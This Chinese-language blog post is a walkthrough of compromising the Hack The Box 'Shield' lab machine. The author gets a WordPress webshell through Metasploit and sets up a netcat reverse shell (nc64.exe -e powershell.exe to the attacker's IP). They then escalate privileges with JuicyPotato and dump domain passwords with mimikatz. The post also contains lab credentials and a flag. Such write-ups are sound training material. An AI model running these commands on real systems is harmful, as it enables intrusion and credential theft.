freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记HACK THE BOX Shield靶场拿flag
2021-03-02 13:42:32

目标网站ip:10.10.10.29最终目的:拿到flag,提升到管理员权限。

一:起手访问网页,nmap跑一下

1614662904_603dccf8f3c2d8343b8e1.png!small?1614662906274

1614662921_603dcd09d2439806bf528.png!small?1614662922870

发现开放了80和3306俩个端口

二:使用工具dirsearch跑一下目录结构,发现wordpress这个cms,访问一下

1614663002_603dcd5a67edf5d49036e.png!small?1614663003471

发现有个登录页面,根据提示是上个靶场的账号和密码,登录进去

账号:admin

密码:P@s5w0rd!

1614663036_603dcd7cd3cc1b6598d35.png!small?1614663037808

三:登录进去之后,利用msfconsole获取webshell。

msfconsole                                       //进入kali的metasploit攻击框架

search wp_admin                              //查找wordpress获取webshell的利用模块

use 0                                                //使用编号为0的模块

show options                             //显示设置需要配置的参数

设置参数

1614663101_603dcdbde11fa0ff29982.png!small?1614663102833

成功获得权限,但回连之后特别容易断

1614663136_603dcde05ca7d2fc00bf9.png!small?1614663137337

查看系统信息

1614663165_603dcdfd84b8ea622085b.png!small?1614663166468

四:解决连接不稳定,上传nc64位到服务器上运行,kali机进行监听

1614663239_603dce47b22e930726d01.png!small?1614663240696

Kaili端就会返回一个cmd命令行

1614663272_603dce6817ecf35169545.png!small?1614663273086

五:因为系统是windows server 2016,此系统容易受到Rotten Potato攻击

用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc64.exe -e powershell.exe 10.10.14.6 1111 > shell.bat

使用多汁的土豆这个工具去执行生成shell.bat,并设置监听端口1111

JP.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\nihao.bat -l 1337

1614663331_603dcea30736993105833.png!small?1614663331982

但奇怪的是,1111端口一直没有返回监听,可能设置出来问题我就改了端口,改为了4567就返回了shell,提权成功,是管理员权限

1614663370_603dceca253401f248f32.png!small?1614663371120

六:查看桌面,拿flag:6e9a9fdc6f64e410a68b847bb4b404fa

1614663410_603dcef2bfe5693848a31.png!small?1614663412034

七:使用mimikatz扫域内其他成员机

上传mimikatz到靶机上去

1614663484_603dcf3cd3d7f255aa891.png!small?1614663485749

执行mimikatz命令获取域内账户和密码

1614663502_603dcf4e1d70b6649ecef.png!small?1614663503065

获得了一个账号名:sandra   密码:Password1234!

# 黑客 # web安全 # 网络安全技术 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录